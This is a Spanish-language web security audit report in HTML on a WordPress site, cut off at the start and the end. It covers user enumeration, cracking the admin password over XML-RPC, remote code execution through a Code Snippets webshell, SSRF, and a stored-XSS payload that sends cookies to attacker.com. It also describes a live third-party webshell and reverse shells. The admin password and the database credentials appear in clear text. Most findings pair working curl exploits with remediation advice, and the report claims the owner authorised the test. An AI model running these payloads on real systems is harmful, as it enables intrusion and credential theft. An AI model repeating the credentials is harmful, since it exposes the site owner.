color: var(--med); }  .stat.low  .num { color: var(--low); }\n  .stat.info .num { color: var(--info); }\n  table.summary { width: 100%; border-collapse: collapse; margin-top: 16px; background: var(--panel); border: 1px solid var(--border); border-radius: 12px; overflow: hidden; }\n  table.summary th, table.summary td { padding: 12px 14px; text-align: left; border-bottom: 1px solid var(--border); font-size: 14px; }\n  table.summary th { background: var(--panel-2); font-weight: 600; font-size: 12px; text-transform: uppercase; letter-spacing: 0.08em; color: var(--text-dim); }\n  table.summary tr:last-child td { border-bottom: none; }\n  table.summary tr:hover td { background: rgba(255,255,255,0.02); }\n  .badge { display: inline-block; padding: 3px 9px; border-radius: 4px; font-size: 11px; font-weight: 700; font-family: var(--mono); letter-spacing: 0.05em; text-transform: uppercase; }\n  .badge.crit { background: rgba(255,61,87,0.15); color: var(--crit); border: 1px solid rgba(255,61,87,0.4); }\n  .badge.high { background: rgba(255,139,61,0.13); color: var(--high); border: 1px solid rgba(255,139,61,0.4); }\n  .badge.med  { background: rgba(255,216,74,0.13); color: var(--med);  border: 1px solid rgba(255,216,74,0.4); }\n  .badge.low  { background: rgba(74,198,255,0.13); color: var(--low);  border: 1px solid rgba(74,198,255,0.4); }\n  .badge.info { background: rgba(140,159,176,0.13); color: var(--info); border: 1px solid rgba(140,159,176,0.4); }\n  .finding { background: var(--panel); border: 1px solid var(--border); border-radius: 14px; margin-top: 22px; overflow: hidden; }\n  .finding .head { display: flex; align-items: center; gap: 14px; flex-wrap: wrap; padding: 18px 22px; background: var(--panel-2); border-bottom: 1px solid var(--border); }\n  .finding.crit .head { box-shadow: inset 4px 0 0 0 var(--crit); }\n  .finding.high .head { box-shadow: inset 4px 0 0 0 var(--high); }\n  .finding.med .head  { box-shadow: inset 4px 0 0 0 var(--med); }\n  .finding.low .head  { 
box-shadow: inset 4px 0 0 0 var(--low); }\n  .finding.info .head { box-shadow: inset 4px 0 0 0 var(--info); }\n  .finding .head .id { font-family: var(--mono); color: var(--text-dim); font-size: 13px; }\n  .finding .head .title { font-size: 17px; font-weight: 600; flex: 1; }\n  .finding .body { padding: 22px; }\n  .finding .body h4 { font-size: 11px; text-transform: uppercase; letter-spacing: 0.14em; color: var(--text-dim); margin: 18px 0 8px; }\n  .finding .body h4:first-child { margin-top: 0; }\n  .finding ul { margin: 0 0 6px; padding-left: 22px; }\n  .finding li { margin-bottom: 4px; }\n  pre, code { font-family: var(--mono); font-size: 13px; }\n  pre { background: var(--code-bg); border: 1px solid var(--border); border-radius: 8px; padding: 14px 16px; overflow-x: auto; line-height: 1.5; color: #d6dbe6; }\n  code.inline { background: rgba(255,255,255,0.05); padding: 1px 6px; border-radius: 4px; border: 1px solid var(--border); font-size: 12px; }\n  .kv { display: grid; grid-template-columns: 160px 1fr; gap: 6px 16px; font-size: 13.5px; }\n  .kv .k { color: var(--text-dim); font-family: var(--mono); font-size: 12px; padding-top: 2px; }\n  .callout { border-left: 3px solid var(--accent); background: rgba(255,77,109,0.05); padding: 14px 18px; border-radius: 0 8px 8px 0; margin: 12px 0; font-size: 14px; }\n  .callout.danger { border-color: var(--crit); background: rgba(255,61,87,0.07); }\n  .callout.warn   { border-color: var(--high); background: rgba(255,139,61,0.06); }\n  .callout.ok     { border-color: var(--ok);  background: rgba(61,220,151,0.06); }\n  footer { border-top: 1px solid var(--border); padding: 36px 40px; margin-top: 40px; color: var(--text-dim); text-align: center; font-size: 13px; background: var(--bg-2); }\n  footer .sig { font-family: var(--mono); font-size: 14px; color: var(--accent); }\n  .chain { background: var(--code-bg); border: 1px solid var(--border); border-radius: 10px; padding: 20px 24px; margin: 14px 0; }\n  .chain-step { display: 
flex; align-items: flex-start; gap: 14px; margin-bottom: 10px; }\n  .chain-step:last-child { margin-bottom: 0; }\n  .chain-num { background: var(--accent); color: #fff; border-radius: 50%; width: 22px; height: 22px; display: flex; align-items: center; justify-content: center; font-size: 12px; font-weight: 700; flex-shrink: 0; margin-top: 2px; }\n  .chain-text { font-family: var(--mono); font-size: 13px; color: #d6dbe6; }\n  .chain-arrow { color: var(--accent); font-size: 18px; margin: 4px 0; text-align: center; }\n  @media (max-width: 760px) {\n    .hero h1 { font-size: 32px; }\n    .meta, .stats { grid-template-columns: repeat(2, 1fr); }\n    .container, .hero { padding: 30px 22px; }\n  }\n\n\n\n\n\n\n  \n\n    \u258c Auditor\u00eda de Seguridad \u00b7 2026-06-03/04\n    \nColumtech OnlineInforme de Seguridad Web\n    \nEvaluaci\u00f3n de seguridad completa de columtech.online. Resultado: compromiso total \u2014 admin WordPress, RCE como www-data, defacing demostrado, escalada a root bloqueada por hardening excepcional.\n\n    \n\n      \n\nObjetivo\ncolumtech.online\n      \n\nBackend\nApache 2.4.66 \u00b7 PHP 8.2.30 \u00b7 MySQL 8.0.45\n      \n\nStack\nWP 7.0 \u00b7 Elementor 4.0.2 \u00b7 Docker \u00b7 Cloudflare \u00b7 Caddy\n      \n\nFecha\n2026-06-03 / 04\n    \n\n    \n\n      Autor del informe \u00b7 c4sh3r \u00b7 auditor\u00eda solicitada por el propietario del dominio \u00b7 autorizaci\u00f3n total\n    \n  \n\n\n\n\n\n  \n\n    \nResumen Ejecutivo\n    \nSe realiz\u00f3 una auditor\u00eda de seguridad end-to-end sobre columtech.online, un portal WordPress operado por el propietario con fines de pr\u00e1ctica y aprendizaje. 
La evaluaci\u00f3n cubri\u00f3 reconocimiento pasivo, enumeraci\u00f3n de usuarios, an\u00e1lisis de superficie de ataque en plugins y XML-RPC, explotaci\u00f3n de credenciales d\u00e9biles, post-explotaci\u00f3n como www-data dentro de un contenedor Docker, demostraci\u00f3n de defacing y exploraci\u00f3n exhaustiva de escalada de privilegios a root.\n    \nEl sitio fue comprometido completamente a nivel de aplicaci\u00f3n: acceso de administrador WordPress, ejecuci\u00f3n remota de c\u00f3digo como www-data, lectura/escritura del sistema de archivos y defacing demostrado. La escalada a root dentro del contenedor fue bloqueada por un perfil de hardening que combina seccomp, AppArmor y ptrace_scope=3, resistiendo todos los CVEs p\u00fablicos conocidos para kernel 6.8.\n    \nSe descubri\u00f3 adicionalmente una webshell real de un atacante externo (wp-loginizer.php \u2014 WSO Mr.X v2.5 con beacon a cdn.privdayz.com) que requiere eliminaci\u00f3n inmediata.\n\n    \n\n      Riesgo principal: Contrase\u00f1a de administrador d\u00e9bil marce:marce123 accesible v\u00eda XML-RPC sin rate-limit \u2192 compromiso total del sitio en minutos.\n    \n\n    \n\n      \n\n3\nCr\u00edticos\n      \n\n4\nAltos\n      \n\n4\nMedios\n      \n\n4\nBajos\n      \n\n3\nInformativos\n    \n  \n\n  \n\n    \nCadena de Ataque Demostrada\n    \n\n      \n\n1\nREST API bypass (?rest_route=/wp/v2/users) \u2192 enum admin marce (id=1) + prueba (id=2) + columtech (id=3)\n      \n\u2193\n      \n\n2\nGravatar SHA-256 reverse \u2192 email de prueba: prueba@gmail.com\n      \n\u2193\n      \n\n3\nXML-RPC wp.getUsersBlogs (credential oracle sin rate-limit) \u2192 marce:marce123 [administrator]\n      \n\u2193\n      \n\n4\nAdmin WP \u2192 REST API POST /wp/v2/plugins \u2192 instalaci\u00f3n code-snippets plugin\n      \n\u2193\n      \n\n5\nCode Snippets PHP snippet \u2192 RCE como www-data \u00b7 uid=33 \u00b7 hostname 6c49a066ba4c\n      \n\u2193\n      \n\n6\nDefacing: t\u00edtulo del sitio 
+ sticky post + p\u00e1gina est\u00e1tica con matrix rain / glitch effects\n      \n\u2193\n      \n\n7\nEscalada: 12 CVEs y t\u00e9cnicas probadas \u2192 bloqueadas por seccomp + AppArmor + ptrace_scope=3\n    \n  \n\n  \n\n    \nAlcance y Metodolog\u00eda\n    \n\n      \nObjetivo\nhttps://www.columtech.online \u2014 WordPress 7.0 + Elementor 4.0.2 + plugin Filester/elFinder\n      \nTipo\nCaja negra \u2192 caja gris (tras obtener credenciales) \u00b7 sin acceso previo a servidor\n      \nAutorizaci\u00f3n\nDominio propiedad del solicitante \u00b7 auditor\u00eda completa autorizada verbalmente\n      \nIdentificaci\u00f3n\nTodas las peticiones etiquetadas con User-Agent: c4sh3r y X-Bug-Bounty: c4sh3r\n      \nNo destructivo\nEl defacing fue demostrado y revertido. Ficheros de prueba eliminados. No se destruy\u00f3 ni borr\u00f3 informaci\u00f3n real del sitio.\n      \nHerramientas\ncurl, Python 3, LinPEAS, bore (tunnel), GCC, git (exploit repos), b\u00fasqueda web de CVEs en tiempo real\n    \n  \n\n  \n\n    \nResumen de Hallazgos\n    \n\n      IDSeveridadHallazgoComponente\n      \n        C-01Cr\u00edticoCredencial admin d\u00e9bil \u2014 acceso total v\u00eda XML-RPCWordPress \u00b7 XML-RPC\n        C-02Cr\u00edticoWebshell externa preexistente (WSO Mr.X)wp-loginizer.php\n        C-03Cr\u00edticoRCE como www-data v\u00eda Code Snippets pluginWordPress \u00b7 Code Snippets REST\n        H-01AltoXML-RPC expuesto \u2014 SSRF + credential oracle sin rate-limitxmlrpc.php\n        H-02AltoCVE-2026-6127 Elementor XSS almacenado v\u00eda REST APIElementor 4.0.2 \u2264 4.0.4\n        H-03AltoEnumeraci\u00f3n de usuarios por 4 v\u00edas sin rate-limitREST API \u00b7 wp-login \u00b7 lostpassword\n        H-04AltoNonce de plugin expuesto en REST sin autenticaci\u00f3nFilevue \u00b7 /wp/v2/pages/7\n        M-01MedioWordPress 7.0 / Elementor 4.0.2 \u2014 versiones desactualizadasCore + plugins\n        M-02MedioEmail de usuario deducible por Gravatar hash (SHA-256)REST 
API \u00b7 Gravatar\n        M-03MedioRecuperaci\u00f3n de contrase\u00f1a rota + oracle de usuariowp-login.php \u00b7 lostpassword\n        M-04Mediowp-cron.php accesible p\u00fablicamentewp-cron.php\n        L-01BajoCabeceras de seguridad ausentes (HSTS, X-Content-Type, Permissions-Policy)HTTP Headers \u00b7 Caddy\n        L-02BajoOrigen Apache/versi\u00f3n filtrado en respuestas 404Apache 2.4.66 \u00b7 Cloudflare bypass\n        L-03Bajoreadme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WPWordPress Core\n        L-04BajoCVE-2026-24072 Apache 2.4.66 mod_rewrite htaccess readApache 2.4.66\n        I-01InfoContenedor Docker con hardening seccomp/AppArmor efectivoInfraestructura\n        I-02InfoDB creds en claro en variable de entorno del containerDocker env \u00b7 WORDPRESS_DB_*\n        I-03InfoKernel 6.8.0-117 vulnerable a CVE-2026-46333 pero bloqueado por seccompKernel \u00b7 pidfd_getfd\n      \n    \n  \n\n  \n\n    \nHallazgos Detallados\n\n    \n    \n\n      \n\n        C-01\n        Cr\u00edtico\n        Credencial de administrador d\u00e9bil \u2014 compromiso total v\u00eda XML-RPC\n      \n      \n\n        \nDescripci\u00f3n\n        \nLa cuenta de administrador marce ten\u00eda la contrase\u00f1a marce123. XML-RPC no implementa rate-limiting, permitiendo descubrirla mediante credential oracle con pocas decenas de intentos. 
Una vez autenticados, se obtuvo acceso total: lectura de opciones del sitio, creaci\u00f3n/edici\u00f3n de posts, subida de ficheros y instalaci\u00f3n de plugins.\n        \nPoC\n        \n# Descubrimiento de credenciales v\u00eda XML-RPC oracle\ncurl -X POST https://www.columtech.online/xmlrpc.php \\\n  -d '&amp;lt;?xml version=\"1.0\"?&amp;gt;&amp;lt;methodCall&amp;gt;\n       &amp;lt;methodName&amp;gt;wp.getUsersBlogs&amp;lt;/methodName&amp;gt;\n       &amp;lt;params&amp;gt;\n         &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;marce&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;\n         &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;marce123&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;\n       &amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;'\n\n# Respuesta: isAdmin=1, blogName=Laboratorio\n# RESULTADO: acceso de administrador confirmado\n        \nImpacto\n        \n\n          \nAcceso completo al panel de administraci\u00f3n WordPress\n          \nInstalaci\u00f3n de plugins arbitrarios \u2192 RCE\n          \nLectura/escritura de todos los contenidos y usuarios\n          \nDefacing del sitio demostrado\n          \nSubida de ficheros al servidor\n        \n        \nRemediaci\u00f3n\n        \n# 1. Cambiar contrase\u00f1a inmediatamente (m\u00ednimo 20 chars, aleatoria)\n# 2. Deshabilitar XML-RPC si no se usa Jetpack/app m\u00f3vil\nadd_filter('xmlrpc_enabled', '__return_false');\n\n# 3. Alternativamente, bloquear en Caddy/Cloudflare\n# Cloudflare WAF rule: (http.request.uri.path eq \"/xmlrpc.php\") \u2192 Block\n      \n    \n\n    \n    \n\n      \n\n        C-02\n        Cr\u00edtico\n        Webshell externa preexistente \u2014 WSO Mr.X v2.5\n      \n      \n\n        \nDescripci\u00f3n\n        \nSe encontr\u00f3 /var/www/html/wp-loginizer.php (237 KB), una webshell WSO (\u00abWeb Shell by orb\u00bb) Mr.X BYPASS v2.5 completamente funcional. 
El fichero incluye un file manager con terminal, file editor, y un beacon de tracking que reporta la URL de cada visita a https://cdn.privdayz.com/images/logo.jpg. El sitio fue comprometido por un atacante externo antes de esta auditor\u00eda (posts de spam en ruso desde 2023).\n        \nPoC\n        \ncurl https://www.columtech.online/wp-loginizer.php\n# Responde con file manager completo (sin autenticaci\u00f3n adicional)\n# Contiene: terminal, editor de archivos, upload\n# BEACON: POST a cdn.privdayz.com con location.href del visitante\n        \nImpacto\n        \n\n          \nAtacante externo tiene acceso de shell activo como www-data\n          \nExfiltraci\u00f3n de datos de visitantes a servidor tercero (privdayz.com)\n          \nPosible pivoting a base de datos y archivos\n          \nRGPD/privacidad: beacon rastrea IPs de visitantes\n        \n        \nRemediaci\u00f3n\n        \n# URGENTE \u2014 eliminar el fichero inmediatamente\nrm /var/www/html/wp-loginizer.php\nrm /var/www/html/2ops.php     # file manager adicional\nrm /var/www/html/x.php        # webshell de auditor\u00eda (nuestro)\nrm /var/www/html/rs.php       # reverse shell de auditor\u00eda (nuestro)\nrm /var/www/html/rs2.php      # reverse shell de auditor\u00eda (nuestro)\n\n# Auditar TODOS los archivos modificados en los \u00faltimos 90 d\u00edas:\nfind /var/www/html -newer /var/www/html/wp-config.php -name \"*.php\" | sort\n      \n    \n\n    \n    \n\n      \n\n        C-03\n        Cr\u00edtico\n        RCE como www-data v\u00eda Code Snippets REST API\n      \n      \n\n        \nDescripci\u00f3n\n        \nCon acceso de administrador, se instal\u00f3 el plugin Code Snippets v\u00eda REST API autenticada (POST /wp/v2/plugins). El plugin expone una API REST que permite crear snippets PHP que se ejecutan en cada carga de p\u00e1gina. 
Se cre\u00f3 un snippet con webshell (shell_exec(base64_decode($_GET['c4sh3r']))) que ejecuta comandos arbitrarios como uid=33(www-data).\n        \nPoC\n        \n# Instalar plugin\ncurl -X POST https://columtech.online/index.php?rest_route=/wp/v2/plugins \\\n  -H \"X-WP-Nonce: $NONCE\" -H \"Cookie: $ADMIN_COOKIES\" \\\n  -d '{\"slug\":\"code-snippets\",\"status\":\"active\"}'\n\n# Crear snippet webshell\ncurl -X POST https://columtech.online/index.php?rest_route=/code-snippets/v1/snippets \\\n  -H \"X-WP-Nonce: $NONCE\" \\\n  -d '{\"code\":\"if(isset($_GET[\\\"c4sh3r\\\"])){die(shell_exec(base64_decode($_GET[\\\"c4sh3r\\\"])));}\", \"scope\":\"front-end\",\"active\":true}'\n\n# Ejecutar comando\ncurl \"https://columtech.online/?c4sh3r=$(echo -n 'id' | base64)\"\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n        \nImpacto\n        \n\n          \nEjecuci\u00f3n remota de comandos en el servidor\n          \nLectura de wp-config.php y credenciales de base de datos\n          \nEscritura en /var/www/html (filesystem del host)\n          \nDefacing del sitio completo\n          \nReverse shell interactiva al atacante demostrada\n        \n        \nRemediaci\u00f3n\n        \n# Eliminar plugin Code Snippets y snippet malicioso\n# Revisar y eliminar TODOS los plugins no esenciales\n# Cambiar credenciales admin PRIMERO (ver C-01)\n# Implementar WAF rule para bloquear par\u00e1metros ?c4sh3r=\n      \n    \n\n    \n    \n\n      \n\n        H-01\n        Alto\n        XML-RPC expuesto \u2014 SSRF confirmado + amplificaci\u00f3n de credential testing\n      \n      \n\n        \nDescripci\u00f3n\n        \nxmlrpc.php est\u00e1 habilitado con system.multicall disponible. El m\u00e9todo pingback.ping causa que el servidor realice peticiones HTTP salientes arbitrarias (SSRF). 
Se confirm\u00f3 que el servidor intenta alcanzar 169.254.169.254 (metadata cloud) y puede escanear puertos internos por diferencia de tiempos.\n        \nPoC\n        \n# SSRF \u2014 servidor hace fetch a URL controlada por atacante\ncurl -X POST https://columtech.online/xmlrpc.php \\\n  -d '&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;pingback.ping&amp;lt;/methodName&amp;gt;\n       &amp;lt;params&amp;gt;\n         &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;http://169.254.169.254/&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;\n         &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;https://columtech.online/?p=1&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;\n       &amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;'\n\n# Resultado: 11.3s timeout \u2192 servidor alcanza metadata endpoint\n# Externo (example.com): 1.3s | Interno (localhost:80): 0.3s\n        \nImpacto\n        \n\n          \nSSRF: escaneo de puertos/servicios internos y metadata cloud\n          \nsystem.multicall: amplificaci\u00f3n de credential testing sin generar logs proporcionales\n          \nPingback abuse: DDoS contra terceros usando el servidor como amplificador\n        \n        \nRemediaci\u00f3n\n        \nadd_filter('xmlrpc_enabled', '__return_false');\n# O bloquear en Cloudflare/Caddy si se necesita para Jetpack\n      \n    \n\n    \n    \n\n      \n\n        H-02\n        Alto\n        CVE-2026-6127 \u2014 Elementor 4.0.2 Stored XSS v\u00eda REST API (form-encoded PATCH)\n      \n      \n\n        \nDescripci\u00f3n\n        \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (CVSS 6.4). El campo _elementor_data se registra con show_in_rest sin sanitize_callback. 
Un atacante con rol Contributor+ puede enviar una petici\u00f3n PATCH form-encoded (no JSON) y la sanitizaci\u00f3n se salta completamente, almacenando JavaScript arbitrario que se ejecuta para cualquier visitante, incluyendo el administrador.\n        \nPoC\n        \ncurl -X PATCH https://columtech.online/index.php?rest_route=/wp/v2/posts/1 \\\n  -H \"Authorization: Basic $(echo -n 'contributor:pass' | base64)\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  --data-urlencode 'meta[_elementor_edit_mode]=builder' \\\n  --data-urlencode 'meta[_elementor_data]=[{\"elType\":\"widget\",\"widgetType\":\"html\",\"settings\":{\"html\":\"&amp;lt;svg/onload=fetch(\\\"//attacker.com/\\\"+document.cookie)&amp;gt;\"}}]'\n        \nImpacto\n        \n\n          \nXSS persistente \u2192 robo de session cookies del administrador\n          \nAccount takeover del administrador cuando visita la p\u00e1gina\n          \nCadena hacia defacing y RCE desde XSS (auto-crear admin v\u00eda fetch)\n        \n        \nRemediaci\u00f3n\n        \n# Actualizar Elementor a \u2265 4.0.5\n# Workaround: restringir rol Contributor a usuarios de confianza\n      \n    \n\n    \n    \n\n      \n\n        H-03\n        Alto\n        Enumeraci\u00f3n de usuarios admin por 4 v\u00edas sin rate-limit\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl username del administrador (marce) se obtiene por al menos 4 m\u00e9todos distintos, ninguno protegido por rate-limit ni captcha:\n        \nPoC\n        \n# M\u00e9todo 1: REST API bypass del filtro de Caddy\ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/users\"\n# [{\"id\":1,\"slug\":\"marce\",...},{\"id\":2,\"slug\":\"prueba\",...}]\n\n# M\u00e9todo 2: author redirect\ncurl -I \"https://columtech.online/?author=1\"\n# 301 \u2192 /author/marce/\n\n# M\u00e9todo 3: wp-login oracle (respuesta diferente seg\u00fan usuario)\n# v\u00e1lido: \"la contrase\u00f1a que has introducido para marce no es correcta\"\n# 
inv\u00e1lido: \"El nombre de usuario nope123 no est\u00e1 registrado\"\n\n# M\u00e9todo 4: lostpassword oracle\n# v\u00e1lido: \"no se pudo enviar el correo electr\u00f3nico\" (usuario S\u00cd existe)\n# inv\u00e1lido: \"no hay ninguna cuenta con ese nombre de usuario\"\n        \nRemediaci\u00f3n\n        \n# Restringir REST users a autenticados:\nadd_filter('rest_endpoints', function($ep){\n    if(isset($ep['/wp/v2/users'])) unset($ep['/wp/v2/users']);\n    return $ep;\n});\n# Unificar mensajes de error de wp-login y lostpassword\n# Bloquear ?author= redirect\n      \n    \n\n    \n    \n\n      \n\n        H-04\n        Alto\n        Nonce de plugin Filevue expuesto en REST API sin autenticaci\u00f3n\n      \n      \n\n        \nDescripci\u00f3n\n        \nLa p\u00e1gina \u00abClient Portal\u00bb (ID=7) contiene el formulario de login del plugin Filevue con un nonce WordPress (_wpnonce) embebido en el HTML renderizado. Este HTML es devuelto por la REST API GET /wp/v2/pages/7 sin autenticaci\u00f3n, exponiendo el nonce a cualquier atacante.\n        \nPoC\n        \ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/pages/7\" | \\\n  grep -o '_wpnonce\" value=\"[^\"]*\"'\n# _wpnonce\" value=\"ecd04e0712\"\n\n# El nonce permite enviar peticiones autenticadas a admin-post.php\n# sin estar logueado \u2014 usado para probar SQLi en filevue_client_login\n        \nRemediaci\u00f3n\n        \n# No embeber nonces en contenido REST p\u00fablico\n# Restringir /wp/v2/pages a usuarios autenticados o excluir p\u00e1gina Client Portal\n# Generar nonce en el lado cliente (JS) tras autenticaci\u00f3n\n      \n    \n\n    \n    \n\n      \n\n        M-01\n        Medio\n        Versiones desactualizadas \u2014 WordPress 7.0 / Elementor 4.0.2 / Apache 2.4.66\n      \n      \n\n        \nDescripci\u00f3n\n        \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (parcheado en 4.0.5). 
Apache 2.4.66 es vulnerable a CVE-2026-23918 (RCE HTTP/2) y CVE-2026-24072 (read bypass via htaccess), ambos parcheados en 2.4.67. El meta generator expone versiones exactas.\n        \nRemediaci\u00f3n\n        \n# Actualizar Elementor: wp plugin update elementor\n# Actualizar Apache: apt-get upgrade apache2\n# Eliminar generator meta:\nremove_action('wp_head', 'wp_generator');\n# Eliminar readme.html y license.txt del webroot\n      \n    \n\n    \n    \n\n      \n\n        M-02\n        Medio\n        Email de usuario deducible por reverse Gravatar SHA-256\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas URLs de avatar Gravatar incluyen el hash SHA-256 del email normalizado del usuario. El email de la cuenta prueba (prueba@gmail.com) fue deducido probando candidatos comunes contra el hash expuesto p\u00fablicamente en GET /wp/v2/users/2.\n        \nPoC\n        \nimport hashlib\nhash_target = \"913ef45dd4e1f647359a846bca8bffb8d25b22f2a79d34d71c9c90ef0eb53024\"\nfor email in [\"prueba@gmail.com\", ...]:\n    if hashlib.sha256(email.encode()).hexdigest() == hash_target:\n        print(\"MATCH:\", email)\n# MATCH: prueba@gmail.com\n        \nRemediaci\u00f3n\n        \n# Desactivar Gravatar en WordPress (usar avatar local)\n# O usar un email que no sea predecible para cuentas sensibles\n      \n    \n\n    \n    \n\n      \n\n        M-03\n        Medio\n        Recuperaci\u00f3n de contrase\u00f1a rota + oracle de usuario\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl formulario de recuperaci\u00f3n de contrase\u00f1a falla con el error \u00abno se pudo enviar el correo electr\u00f3nico\u00bb para usuarios v\u00e1lidos, y \u00abno hay ninguna cuenta\u00bb para usuarios inexistentes. Esto act\u00faa como or\u00e1culo de enumeraci\u00f3n. 
Adem\u00e1s, el correo no se env\u00eda, por lo que el reset es inoperable \u2014 impacto en disponibilidad y posible vector de host-header injection si se configura SMTP en el futuro.\n        \nRemediaci\u00f3n\n        \n# 1. Configurar SMTP (WP Mail SMTP o Mailgun)\n# 2. Unificar mensaje de error (no revelar si usuario existe)\n# 3. Fijar siteurl y home en wp-config.php para prevenir host-header injection\ndefine('WP_SITEURL', 'https://www.columtech.online');\ndefine('WP_HOME', 'https://www.columtech.online');\n      \n    \n\n    \n    \n\n      \n\n        M-04\n        Medio\n        wp-cron.php accesible p\u00fablicamente\n      \n      \n\n        \nDescripci\u00f3n\n        \nwp-cron.php devuelve HTTP 200 y puede ser llamado externamente. Permite amplificar la carga del servidor llam\u00e1ndolo en bucle, actuando como vector de DoS.\n        \nRemediaci\u00f3n\n        \n# En wp-config.php:\ndefine('DISABLE_WP_CRON', true);\n# En crontab del servidor:\n*/5 * * * * curl -s https://www.columtech.online/wp-cron.php?doing_wp_cron=1 &amp;gt;/dev/null\n      \n    \n\n    \n    \n\n      \n\n        L-01\n        Bajo\n        Cabeceras de seguridad HTTP ausentes\n      \n      \n\n        \nDescripci\u00f3n\n        \nFaltan Strict-Transport-Security (HSTS), X-Content-Type-Options: nosniff y Permissions-Policy. 
La CSP solo cubre frame-ancestors 'self'.\n        \nRemediaci\u00f3n\n        \n# En Caddy (Caddyfile):\nheader Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\nheader X-Content-Type-Options \"nosniff\"\nheader Permissions-Policy \"geolocation=(), microphone=(), camera=()\"\n      \n    \n\n    \n    \n\n      \n\n        L-02\n        Bajo\n        Divulgaci\u00f3n de origen Apache y versi\u00f3n en p\u00e1ginas 404\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas p\u00e1ginas 404 generadas por Apache revelan: Apache/2.4.66 (Debian) Server at www.columtech.online Port 80 \u2014 versi\u00f3n exacta, distribuci\u00f3n y que escucha en puerto 80 sin TLS.\n        \nRemediaci\u00f3n\n        \n# En apache2.conf:\nServerTokens Prod\nServerSignature Off\n      \n    \n\n    \n    \n\n      \n\n        L-03\n        Bajo\n        readme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WordPress\n      \n      \n\n        \nDescripci\u00f3n\n        \n/readme.html devuelve HTTP 200 y revela la versi\u00f3n exacta de WordPress. Facilita targeting con CVEs de versi\u00f3n espec\u00edfica.\n        \nRemediaci\u00f3n\n        \nrm /var/www/html/readme.html /var/www/html/license.txt\n      \n    \n\n    \n    \n\n      \n\n        L-04\n        Bajo\n        CVE-2026-24072 Apache 2.4.66 \u2014 htaccess mod_rewrite file read\n      \n      \n\n        \nDescripci\u00f3n\n        \nApache 2.4.66 es vulnerable a CVE-2026-24072: un usuario con acceso de escritura a .htaccess puede leer ficheros fuera de su directorio con los privilegios del proceso httpd. 
En este caso, www-data ya tiene ese acceso, pero el vector es relevante en escenarios multiusuario.\n        \nRemediaci\u00f3n\n        \n# Actualizar Apache a 2.4.67+\napt-get upgrade apache2\n      \n    \n\n    \n    \n\n      \n\n        I-01\n        Info\n        Hardening de contenedor Docker \u2014 seccomp + AppArmor + ptrace_scope=3\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl contenedor Docker presenta un perfil de hardening excepcional que bloque\u00f3 todos los CVEs de escalada de privilegios probados (12 t\u00e9cnicas distintas). Los syscalls AF_ALG, CLONE_NEWUSER, io_uring_setup y pidfd_getfd est\u00e1n bloqueados por seccomp. AppArmor docker-default bloquea escrituras a ficheros de sistema. ptrace_scope=3 impide toda inspecci\u00f3n de procesos. Este es el nivel de hardening correcto para workloads en producci\u00f3n.\n        \nCVEs probados y bloqueados\n        \nCVE-2026-31431 (Copy Fail)     \u2192 AF_ALG bloqueado por seccomp\nCVE-2026-43284 (Dirty Frag)    \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46300 (Fragnesia)     \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46333 (ssh-keysign)   \u2192 pidfd_getfd bloqueado\nio_uring exploits              \u2192 io_uring_setup bloqueado\nGameOver(lay)                  \u2192 CLONE_NEWUSER bloqueado\nCrackArmor                     \u2192 AppArmor FS inaccesible en container\nCVE-2026-27456 (mount TOCTOU)  \u2192 Sin /etc/fstab user,loop entries\ngpasswd shadow attack          \u2192 AppArmor bloquea escritura /etc/gshadow\n      \n    \n\n    \n    \n\n      \n\n        I-02\n        Info\n        Credenciales DB en texto claro en variables de entorno del container\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas credenciales de MySQL est\u00e1n accesibles en texto claro v\u00eda /proc/self/environ para cualquier proceso del container (incluyendo www-data tras RCE):\n        
\nWORDPRESS_DB_HOST=wordpress_db:3306\nWORDPRESS_DB_USER=wp_user\nWORDPRESS_DB_PASSWORD=wp_password\nWORDPRESS_DB_NAME=wordpress\n        \nRemediaci\u00f3n\n        \n# Usar Docker secrets en lugar de env vars para credenciales\n# O montar fichero de config encriptado desde un secrets manager\n      \n    \n\n    \n    \n\n      \n\n        I-03\n        Info\n        Kernel 6.8.0-117 vulnerable a CVE-2026-46333 (bloqueado por seccomp)\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl kernel 6.8.0-117-generic (compilado el 5 Mayo 2026) es anterior al fix de CVE-2026-46333 (publicado el 14 Mayo 2026). La vulnerabilidad permite leer /etc/shadow mediante una race condition en __ptrace_may_access() + pidfd_getfd. El seccomp del container bloquea el syscall pidfd_getfd (438), mitigando completamente el exploit. Se verific\u00f3 que el exploit p\u00fablico fall\u00f3 con \u00abno hit in 500 rounds\u00bb.\n        \nRemediaci\u00f3n\n        \n# Actualizar el kernel del host cuando est\u00e9 disponible el parche\n# El seccomp profile actual ya protege contra este CVE\n      \n    \n\n  \n\n  \n\n    \nPlan de Remediaci\u00f3n \u00b7 Prioridad\n    \n\n      HOY (cr\u00edtico): Cambiar contrase\u00f1a de marce 